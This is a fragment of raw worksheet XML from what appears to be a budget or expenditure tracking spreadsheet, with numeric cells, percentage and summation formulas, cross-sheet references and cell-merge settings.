      <c r="S60" s="266"/>
      <c r="T60" s="266"/>
      <c r="U60" s="266"/>
      <c r="V60" s="266"/>
      <c r="W60" s="266"/>
      <c r="X60" s="266"/>
      <c r="Y60" s="266"/>
      <c r="Z60" s="267"/>
    </row>
    <row r="61" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A61" s="191" t="s">
        <v>262</v>
      </c>
      <c r="B61" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C61" s="193"/>
      <c r="D61" s="193"/>
      <c r="E61" s="194">
        <v>134000</v>
      </c>
      <c r="F61" s="194"/>
      <c r="G61" s="225"/>
      <c r="H61" s="194"/>
      <c r="I61" s="361">
        <v>1115873</v>
      </c>
      <c r="J61" s="194"/>
      <c r="K61" s="194"/>
      <c r="L61" s="361">
        <v>1101160.08</v>
      </c>
      <c r="M61" s="361">
        <v>37769.1699999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>72.633019230769</v>
      </c>
      <c r="O61" s="263"/>
      <c r="P61" s="264"/>
      <c r="Q61" s="268"/>
      <c r="R61" s="269"/>
      <c r="S61" s="269"/>
      <c r="T61" s="269"/>
      <c r="U61" s="269"/>
      <c r="V61" s="269"/>
      <c r="W61" s="269"/>
      <c r="X61" s="269"/>
      <c r="Y61" s="269"/>
      <c r="Z61" s="270"/>
    </row>
    <row r="62" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A62" s="191"/>
      <c r="B62" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C62" s="193"/>
      <c r="D62" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E62" s="194"/>
      <c r="F62" s="194"/>
      <c r="G62" s="225"/>
      <c r="H62" s="194"/>
      <c r="I62" s="361">
        <v>835993.456</v>
      </c>
      <c r="J62" s="194"/>
      <c r="K62" s="194"/>
      <c r="L62" s="361">
        <v>834472.796</v>
      </c>
      <c r="M62" s="361">
        <v>18454.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>73.818536</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>304</v>
      </c>
      <c r="Q62" s="271"/>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194"/>
      <c r="G63" s="225"/>
      <c r="H63" s="194"/>
      <c r="I63" s="361">
        <v>0</v>
      </c>
      <c r="J63" s="194"/>
      <c r="K63" s="194"/>
      <c r="L63" s="361">
        <v>0</v>
      </c>
      <c r="M63" s="361">
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N63" s="212"/>
      <c r="O63" s="263"/>
      <c r="P63" s="275"/>
      <c r="Q63" s="265"/>
      <c r="R63" s="266"/>
      <c r="S63" s="266"/>
      <c r="T63" s="266"/>
      <c r="U63" s="266"/>
      <c r="V63" s="266"/>
      <c r="W63" s="266"/>
      <c r="X63" s="266"/>
      <c r="Y63" s="266"/>
      <c r="Z63" s="267"/>
    </row>
    <row r="64" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A64" s="191"/>
      <c r="B64" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C64" s="193"/>
      <c r="D64" s="193"/>
      <c r="E64" s="194"/>
      <c r="F64" s="194"/>
      <c r="G64" s="225"/>
      <c r="H64" s="194"/>
      <c r="I64" s="361">
        <v>0</v>
      </c>
      <c r="J64" s="194"/>
      <c r="K64" s="194"/>
      <c r="L64" s="361">
        <v>0</v>
      </c>
      <c r="M64" s="361"/>
      <c r="N64" s="195"/>
      <c r="O64" s="263"/>
      <c r="P64" s="276"/>
      <c r="Q64" s="268"/>
      <c r="R64" s="269"/>
      <c r="S64" s="269"/>
      <c r="T64" s="269"/>
      <c r="U64" s="269"/>
      <c r="V64" s="269"/>
      <c r="W64" s="269"/>
      <c r="X64" s="269"/>
      <c r="Y64" s="269"/>
      <c r="Z64" s="270"/>
    </row>
    <row r="65" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A65" s="191"/>
      <c r="B65" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C65" s="193"/>
      <c r="D65" s="193"/>
      <c r="E65" s="194">
        <v>145000</v>
      </c>
      <c r="F65" s="194"/>
      <c r="G65" s="225"/>
      <c r="H65" s="194"/>
      <c r="I65" s="361">
        <v>0</v>
      </c>
      <c r="J65" s="194"/>
      <c r="K65" s="194"/>
      <c r="L65" s="361">
        <v>0</v>
      </c>
      <c r="M65" s="361"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q65" s="271"/>
      <c r="R65" s="272"/>
      <c r="S65" s="272"/>
      <c r="T65" s="272"/>
      <c r="U65" s="272"/>
      <c r="V65" s="272"/>
      <c r="W65" s="272"/>
      <c r="X65" s="272"/>
      <c r="Y65" s="272"/>
      <c r="Z65" s="273"/>
    </row>
    <row r="66" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A66" s="191"/>
      <c r="B66" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C66" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D66" s="193"/>
      <c r="E66" s="194"/>
      <c r="F66" s="194"/>
      <c r="G66" s="194"/>
      <c r="H66" s="194"/>
      <c r="I66" s="194">
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194"/>
      <c r="L66" s="194">
        <v>0</v>
      </c>
      <c r="M66" s="194"/>
      <c r="N66" s="195"/>
      <c r="O66" s="263"/>
      <c r="P66" s="264"/>
      <c r="Q66" s="265"/>
      <c r="R66" s="266"/>
      <c r="S66" s="266"/>
      <c r="T66" s="266"/>
      <c r="U66" s="266"/>
      <c r="V66" s="266"/>
      <c r="W66" s="266"/>
      <c r="X66" s="266"/>
      <c r="Y66" s="266"/>
      <c r="Z66" s="267"/>
    </row>
    <row r="67" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A67" s="191"/>
      <c r="B67" s="191"/>
      <c r="C67" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D67" s="193"/>
      <c r="E67" s="194"/>
      <c r="F67" s="277"/>
      <c r="G67" s="194"/>
      <c r="H67" s="194"/>
      <c r="I67" s="194">
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194"/>
      <c r="L67" s="194">
        <v>0</v>
      </c>
      <c r="M67" s="194"/>
      <c r="N67" s="195"/>
      <c r="O67" s="263"/>
      <c r="P67" s="264"/>
      <c r="Q67" s="268"/>
      <c r="R67" s="269"/>
      <c r="S67" s="269"/>
      <c r="T67" s="269"/>
      <c r="U67" s="269"/>
      <c r="V67" s="269"/>
      <c r="W67" s="269"/>
      <c r="X67" s="269"/>
      <c r="Y67" s="269"/>
      <c r="Z67" s="270"/>
    </row>
    <row r="68" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A68" s="191" t="s">
        <v>263</v>
      </c>
      <c r="B68" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C68" s="193"/>
      <c r="D68" s="193"/>
      <c r="E68" s="194">
        <v>0</v>
      </c>
      <c r="F68" s="194"/>
      <c r="G68" s="194"/>
      <c r="H68" s="194"/>
      <c r="I68" s="361">
        <v>0</v>
      </c>
      <c r="J68" s="194"/>
      <c r="K68" s="194"/>
      <c r="L68" s="361">
        <v>0</v>
      </c>
      <c r="M68" s="361">
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q68" s="271"/>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194"/>
      <c r="G69" s="194"/>
      <c r="H69" s="194"/>
      <c r="I69" s="361">
        <v>0</v>
      </c>
      <c r="J69" s="194"/>
      <c r="K69" s="194"/>
      <c r="L69" s="361">
        <v>0</v>
      </c>
      <c r="M69" s="361">
        <v>467.66</v>
      </c>
      <c r="N69" s="207">
        <f>(M69+M70)/50000*100</f>
        <v>0.93532</v>
      </c>
      <c r="O69" s="263"/>
      <c r="P69" s="264"/>
      <c r="Q69" s="265"/>
      <c r="R69" s="266"/>
      <c r="S69" s="266"/>
      <c r="T69" s="266"/>
      <c r="U69" s="266"/>
      <c r="V69" s="266"/>
      <c r="W69" s="266"/>
      <c r="X69" s="266"/>
      <c r="Y69" s="266"/>
      <c r="Z69" s="267"/>
    </row>
    <row r="70" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A70" s="191"/>
      <c r="B70" s="193"/>
      <c r="C70" s="193"/>
      <c r="D70" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E70" s="194"/>
      <c r="F70" s="194"/>
      <c r="G70" s="194"/>
      <c r="H70" s="194"/>
      <c r="I70" s="361">
        <v>0</v>
      </c>
      <c r="J70" s="194"/>
      <c r="K70" s="194"/>
      <c r="L70" s="361">
        <v>0</v>
      </c>
      <c r="M70" s="361">
        <v>0</v>
      </c>
      <c r="N70" s="212"/>
      <c r="O70" s="263"/>
      <c r="P70" s="264"/>
      <c r="Q70" s="268"/>
      <c r="R70" s="269"/>
      <c r="S70" s="269"/>
      <c r="T70" s="269"/>
      <c r="U70" s="269"/>
      <c r="V70" s="269"/>
      <c r="W70" s="269"/>
      <c r="X70" s="269"/>
      <c r="Y70" s="269"/>
      <c r="Z70" s="270"/>
    </row>
    <row r="71" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A71" s="191"/>
      <c r="B71" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C71" s="193"/>
      <c r="D71" s="193"/>
      <c r="E71" s="194"/>
      <c r="F71" s="194"/>
      <c r="G71" s="194"/>
      <c r="H71" s="194"/>
      <c r="I71" s="194">
        <v>0</v>
      </c>
      <c r="J71" s="194"/>
      <c r="K71" s="194"/>
      <c r="L71" s="194">
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>285</v>
      </c>
      <c r="Q71" s="271"/>
      <c r="R71" s="272"/>
      <c r="S71" s="272"/>
      <c r="T71" s="272"/>
      <c r="U71" s="272"/>
      <c r="V71" s="272"/>
      <c r="W71" s="272"/>
      <c r="X71" s="272"/>
      <c r="Y71" s="272"/>
      <c r="Z71" s="273"/>
    </row>
    <row r="72" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A72" s="191"/>
      <c r="B72" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C72" s="193"/>
      <c r="D72" s="193"/>
      <c r="E72" s="194">
        <v>0</v>
      </c>
      <c r="F72" s="194"/>
      <c r="G72" s="194"/>
      <c r="H72" s="194"/>
      <c r="I72" s="194">
        <v>0</v>
      </c>
      <c r="J72" s="194"/>
      <c r="K72" s="194"/>
      <c r="L72" s="194">
        <v>0</v>
      </c>
      <c r="M72" s="194"/>
      <c r="N72" s="195"/>
      <c r="O72" s="263"/>
      <c r="P72" s="264"/>
      <c r="Q72" s="265"/>
      <c r="R72" s="266"/>
      <c r="S72" s="266"/>
      <c r="T72" s="266"/>
      <c r="U72" s="266"/>
      <c r="V72" s="266"/>
      <c r="W72" s="266"/>
      <c r="X72" s="266"/>
      <c r="Y72" s="266"/>
      <c r="Z72" s="267"/>
    </row>
    <row r="73" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A73" s="191"/>
      <c r="B73" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C73" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D73" s="193"/>
      <c r="E73" s="194"/>
      <c r="F73" s="194"/>
      <c r="G73" s="194"/>
      <c r="H73" s="194"/>
      <c r="I73" s="194">
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194"/>
      <c r="L73" s="194">
        <v>0</v>
      </c>
      <c r="M73" s="194"/>
      <c r="N73" s="195"/>
      <c r="O73" s="263"/>
      <c r="P73" s="264"/>
      <c r="Q73" s="268"/>
      <c r="R73" s="269"/>
      <c r="S73" s="269"/>
      <c r="T73" s="269"/>
      <c r="U73" s="269"/>
      <c r="V73" s="269"/>
      <c r="W73" s="269"/>
      <c r="X73" s="269"/>
      <c r="Y73" s="269"/>
      <c r="Z73" s="270"/>
    </row>
    <row r="74" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A74" s="191"/>
      <c r="B74" s="191"/>
      <c r="C74" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D74" s="193"/>
      <c r="E74" s="194"/>
      <c r="F74" s="194"/>
      <c r="G74" s="194"/>
      <c r="H74" s="194"/>
      <c r="I74" s="194">
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194"/>
      <c r="L74" s="194">
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263" t="s">
        <v>286</v>
      </c>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271"/>
      <c r="R74" s="272"/>
      <c r="S74" s="272"/>
      <c r="T74" s="272"/>
      <c r="U74" s="272"/>
      <c r="V74" s="272"/>
      <c r="W74" s="272"/>
      <c r="X74" s="272"/>
      <c r="Y74" s="272"/>
      <c r="Z74" s="273"/>
    </row>
    <row r="75" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A75" s="282" t="s">
        <v>287</v>
      </c>
      <c r="B75" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C75" s="193"/>
      <c r="D75" s="193"/>
      <c r="E75" s="241"/>
      <c r="F75" s="241"/>
      <c r="G75" s="241"/>
      <c r="H75" s="194"/>
      <c r="I75" s="194">
        <v>0</v>
      </c>
      <c r="J75" s="241"/>
      <c r="K75" s="194"/>
      <c r="L75" s="194">
        <v>0</v>
      </c>
      <c r="M75" s="241"/>
      <c r="N75" s="241"/>
      <c r="O75" s="263"/>
      <c r="P75" s="283"/>
      <c r="Q75" s="265"/>
      <c r="R75" s="266"/>
      <c r="S75" s="266"/>
      <c r="T75" s="266"/>
      <c r="U75" s="266"/>
      <c r="V75" s="266"/>
      <c r="W75" s="266"/>
      <c r="X75" s="266"/>
      <c r="Y75" s="266"/>
      <c r="Z75" s="267"/>
    </row>
    <row r="76" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A76" s="287"/>
      <c r="B76" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C76" s="193"/>
      <c r="D76" s="193"/>
      <c r="E76" s="241"/>
      <c r="F76" s="241"/>
      <c r="G76" s="241"/>
      <c r="H76" s="194"/>
      <c r="I76" s="194">
        <v>0</v>
      </c>
      <c r="J76" s="241"/>
      <c r="K76" s="194"/>
      <c r="L76" s="194">
        <v>0</v>
      </c>
      <c r="M76" s="241"/>
      <c r="N76" s="241"/>
      <c r="O76" s="263"/>
      <c r="P76" s="288"/>
      <c r="Q76" s="268"/>
      <c r="R76" s="269"/>
      <c r="S76" s="269"/>
      <c r="T76" s="269"/>
      <c r="U76" s="269"/>
      <c r="V76" s="269"/>
      <c r="W76" s="269"/>
      <c r="X76" s="269"/>
      <c r="Y76" s="269"/>
      <c r="Z76" s="270"/>
    </row>
    <row r="77" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A77" s="287"/>
      <c r="B77" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C77" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D77" s="193"/>
      <c r="E77" s="241"/>
      <c r="F77" s="241"/>
      <c r="G77" s="241"/>
      <c r="H77" s="194"/>
      <c r="I77" s="194">
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194"/>
      <c r="L77" s="194">
        <v>0</v>
      </c>
      <c r="M77" s="241"/>
      <c r="N77" s="241"/>
      <c r="O77" s="223"/>
      <c r="P77" s="259"/>
      <c r="Q77" s="313"/>
      <c r="R77" s="313"/>
      <c r="S77" s="313"/>
      <c r="T77" s="313"/>
      <c r="U77" s="313"/>
      <c r="V77" s="313"/>
      <c r="W77" s="313"/>
      <c r="X77" s="313"/>
      <c r="Y77" s="313"/>
      <c r="Z77" s="314"/>
    </row>
    <row r="78" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A78" s="287"/>
      <c r="B78" s="191"/>
      <c r="C78" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D78" s="193"/>
      <c r="E78" s="241"/>
      <c r="F78" s="241"/>
      <c r="G78" s="241"/>
      <c r="H78" s="194"/>
      <c r="I78" s="194">
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194"/>
      <c r="L78" s="194">
        <v>0</v>
      </c>
      <c r="M78" s="241"/>
      <c r="N78" s="241"/>
      <c r="O78" s="223"/>
      <c r="P78" s="264"/>
      <c r="Q78" s="193"/>
      <c r="R78" s="193"/>
      <c r="S78" s="193"/>
      <c r="T78" s="193"/>
      <c r="U78" s="193"/>
      <c r="V78" s="193"/>
      <c r="W78" s="193"/>
      <c r="X78" s="193"/>
      <c r="Y78" s="193"/>
      <c r="Z78" s="315"/>
    </row>
    <row r="79" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A79" s="300" t="s">
        <v>311</v>
      </c>
      <c r="B79" s="203" t="s">
        <v>227</v>
      </c>
      <c r="C79" s="203"/>
      <c r="D79" s="203"/>
      <c r="E79" s="301">
        <v>18000</v>
      </c>
      <c r="F79" s="301"/>
      <c r="G79" s="301"/>
      <c r="H79" s="194"/>
      <c r="I79" s="361">
        <v>147128.47</v>
      </c>
      <c r="J79" s="301"/>
      <c r="K79" s="194"/>
      <c r="L79" s="361">
        <v>141891.45</v>
      </c>
      <c r="M79" s="361">
        <v>4884.78</v>
      </c>
      <c r="N79" s="302"/>
      <c r="O79" s="223"/>
      <c r="P79" s="264"/>
      <c r="Q79" s="193"/>
      <c r="R79" s="193"/>
      <c r="S79" s="193" t="s">
        <v>288</v>
      </c>
      <c r="T79" s="193">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="U79" s="193"/>
      <c r="V79" s="193">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="W79" s="193"/>
      <c r="X79" s="193"/>
      <c r="Y79" s="193"/>
      <c r="Z79" s="315"/>
    </row>
    <row r="80" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A80" s="300"/>
      <c r="B80" s="203" t="s">
        <v>283</v>
      </c>
      <c r="C80" s="203"/>
      <c r="D80" s="303" t="s">
        <v>250</v>
      </c>
      <c r="E80" s="301"/>
      <c r="F80" s="301"/>
      <c r="G80" s="301"/>
      <c r="H80" s="194"/>
      <c r="I80" s="361">
        <v>0</v>
      </c>
      <c r="J80" s="301"/>
      <c r="K80" s="194"/>
      <c r="L80" s="361">
        <v>0</v>
      </c>
      <c r="M80" s="361">
        <v>0</v>
      </c>
      <c r="N80" s="304"/>
      <c r="O80" s="223"/>
      <c r="P80" s="264"/>
      <c r="Q80" s="193"/>
      <c r="R80" s="193"/>
      <c r="S80" s="193"/>
      <c r="T80" s="193"/>
      <c r="U80" s="193"/>
      <c r="V80" s="193"/>
      <c r="W80" s="193"/>
      <c r="X80" s="193"/>
      <c r="Y80" s="193"/>
      <c r="Z80" s="315"/>
    </row>
    <row r="81" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A81" s="300"/>
      <c r="B81" s="203"/>
      <c r="C81" s="203"/>
      <c r="D81" s="203" t="s">
        <v>284</v>
      </c>
      <c r="E81" s="301"/>
      <c r="F81" s="301"/>
      <c r="G81" s="301"/>
      <c r="H81" s="194"/>
      <c r="I81" s="361">
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194"/>
      <c r="L81" s="361">
        <v>0</v>
      </c>
      <c r="M81" s="361"/>
      <c r="N81" s="305"/>
      <c r="O81" s="223"/>
      <c r="P81" s="264"/>
      <c r="Q81" s="193"/>
      <c r="R81" s="193"/>
      <c r="S81" s="193"/>
      <c r="T81" s="193"/>
      <c r="U81" s="193"/>
      <c r="V81" s="193"/>
      <c r="W81" s="193"/>
      <c r="X81" s="193"/>
      <c r="Y81" s="193"/>
      <c r="Z81" s="315"/>
    </row>
    <row r="82" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A82" s="300"/>
      <c r="B82" s="203" t="s">
        <v>253</v>
      </c>
      <c r="C82" s="203"/>
      <c r="D82" s="203"/>
      <c r="E82" s="301"/>
      <c r="F82" s="301"/>
      <c r="G82" s="301"/>
      <c r="H82" s="194"/>
      <c r="I82" s="301">
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194"/>
      <c r="L82" s="301">
        <v>0</v>
      </c>
      <c r="M82" s="301"/>
      <c r="N82" s="302"/>
      <c r="O82" s="223"/>
      <c r="P82" s="264"/>
      <c r="Q82" s="193"/>
      <c r="R82" s="193"/>
      <c r="S82" s="193"/>
      <c r="T82" s="193"/>
      <c r="U82" s="193"/>
      <c r="V82" s="193"/>
      <c r="W82" s="193"/>
      <c r="X82" s="193"/>
      <c r="Y82" s="193"/>
      <c r="Z82" s="315"/>
    </row>
    <row r="83" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A83" s="300"/>
      <c r="B83" s="203" t="s">
        <v>254</v>
      </c>
      <c r="C83" s="203"/>
      <c r="D83" s="203"/>
      <c r="E83" s="301">
        <v>18000</v>
      </c>
      <c r="F83" s="301"/>
      <c r="G83" s="301"/>
      <c r="H83" s="194"/>
      <c r="I83" s="301">
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194"/>
      <c r="L83" s="301">
        <v>0</v>
      </c>
      <c r="M83" s="301"/>
      <c r="N83" s="302"/>
      <c r="O83" s="223"/>
      <c r="P83" s="264"/>
      <c r="Q83" s="193"/>
      <c r="R83" s="193"/>
      <c r="S83" s="193"/>
      <c r="T83" s="193"/>
      <c r="U83" s="193"/>
      <c r="V83" s="193"/>
      <c r="W83" s="193"/>
      <c r="X83" s="193"/>
      <c r="Y83" s="193"/>
      <c r="Z83" s="315"/>
    </row>
    <row r="84" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A84" s="300"/>
      <c r="B84" s="300" t="s">
        <v>231</v>
      </c>
      <c r="C84" s="203" t="s">
        <v>257</v>
      </c>
      <c r="D84" s="203"/>
      <c r="E84" s="301"/>
      <c r="F84" s="301"/>
      <c r="G84" s="301"/>
      <c r="H84" s="194"/>
      <c r="I84" s="301">
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194"/>
      <c r="L84" s="301">
        <v>0</v>
      </c>
      <c r="M84" s="301"/>
      <c r="N84" s="302"/>
      <c r="O84" s="223"/>
      <c r="P84" s="264"/>
      <c r="Q84" s="193"/>
      <c r="R84" s="193"/>
      <c r="S84" s="193"/>
      <c r="T84" s="193"/>
      <c r="U84" s="193"/>
      <c r="V84" s="193"/>
      <c r="W84" s="193"/>
      <c r="X84" s="193"/>
      <c r="Y84" s="193"/>
      <c r="Z84" s="315"/>
    </row>
    <row r="85" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A85" s="300"/>
      <c r="B85" s="300"/>
      <c r="C85" s="203" t="s">
        <v>259</v>
      </c>
      <c r="D85" s="203"/>
      <c r="E85" s="301"/>
      <c r="F85" s="301"/>
      <c r="G85" s="301"/>
      <c r="H85" s="194"/>
      <c r="I85" s="301">
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194"/>
      <c r="L85" s="301">
        <v>0</v>
      </c>
      <c r="M85" s="301"/>
      <c r="N85" s="302"/>
      <c r="O85" s="223"/>
      <c r="P85" s="316"/>
      <c r="Q85" s="317"/>
      <c r="R85" s="317"/>
      <c r="S85" s="317"/>
      <c r="T85" s="317"/>
      <c r="U85" s="317"/>
      <c r="V85" s="317"/>
      <c r="W85" s="317"/>
      <c r="X85" s="317"/>
      <c r="Y85" s="317"/>
      <c r="Z85" s="318"/>
    </row>
    <row r="86" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="S86" s="310"/>
      <c r="T86" s="311"/>
      <c r="U86" s="311"/>
      <c r="V86" s="312"/>
    </row>
    <row r="87" s="172" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="88" s="172" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="89" s="172" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="90" s="172" customFormat="1" ht="14.25" customHeight="1"/>
    <row r="91" s="172" customFormat="1" ht="14.25" customHeight="1" spans="1:26">
      <c r="Y91" s="173"/>
    </row>
    <row r="92" ht="14.25" customHeight="1"/>
    <row r="93" ht="14.25" customHeight="1"/>
    <row r="94" ht="14.25" customHeight="1"/>
    <row r="95" ht="14.25" customHeight="1"/>
    <row r="96" ht="14.25" customHeight="1"/>
    <row r="97" ht="14.25" customHeight="1"/>
    <row r="98" ht="14.25" customHeight="1"/>
    <row r="99" ht="14.25" customHeight="1"/>
    <row r="105" s="172" customFormat="1"/>
    <row r="110" s="172" customFormat="1"/>
    <row r="111" s="172" customFormat="1"/>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O3:Q4"/>
    <mergeCell ref="Q56:Z58"/>
    <mergeCell ref="Q59:Z61"/>
    <mergeCell ref="B62:C63"/>
    <mergeCell ref="Q62:Z64"/>
    <mergeCell ref="Q65:Z67"/>
    <mergeCell ref="Q68:Z70"/>
    <mergeCell ref="B69:C70"/>
    <mergeCell ref="Q71:Z73"/>
    <mergeCell ref="Q74:Z76"/>
    <mergeCell ref="P77:Z85"/>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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="I5" sqref="I5"/>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6.625" style="172" customWidth="1"/>
    <col min="17" max="17" width="9" style="172" customWidth="1"/>
    <col min="18" max="18" width="8.5" style="172" customWidth="1"/>
    <col min="19" max="21" width="8.5" style="173" customWidth="1"/>
    <col min="22" max="22" width="10" style="173" customWidth="1"/>
    <col min="23" max="26" width="8.5" style="173" customWidth="1"/>
    <col min="27" max="16384" width="5.625" style="172"/>
  </cols>
  <sheetData>
    <row r="1" ht="22.5" spans="1:26">
      <c r="A1" s="174" t="s">
        <v>206</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7"/>
      <c r="G2" s="177"/>
      <c r="H2" s="177"/>
      <c r="I2" s="179" t="e">
        <f>0/0</f>
        <v>#DIV/0!</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="180"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>42005</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E21+E31+E41+E51+E61+E71+E78+E85</f>
        <v>700000</v>
      </c>
      <c r="F5" s="194">
        <f>F21+F31+F41+F51+F61+F71+F78+F85</f>
        <v>0</v>
      </c>
      <c r="G5" s="194">
        <f>G21+G31+G41+G51+G61+G71+G78+G85</f>
        <v>0</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'r'!H5</f>
        <v>0</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6154866.03</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J71+J78+J85</f>
        <v>0</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'r'!K5</f>
        <v>0</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6150071.131</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M71+M78+M85</f>
        <v>0</v>
      </c>
      <c r="N5" s="319">
        <f>M5/374000*100</f>
        <v>0</v>
      </c>
      <c r="O5" s="191" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>312</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R5" s="238"/>
      <c r="S5" s="238"/>
      <c r="T5" s="238"/>
      <c r="U5" s="238"/>
      <c r="V5" s="238"/>
      <c r="W5" s="238"/>
      <c r="X5" s="238"/>
      <c r="Y5" s="238"/>
      <c r="Z5" s="233"/>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
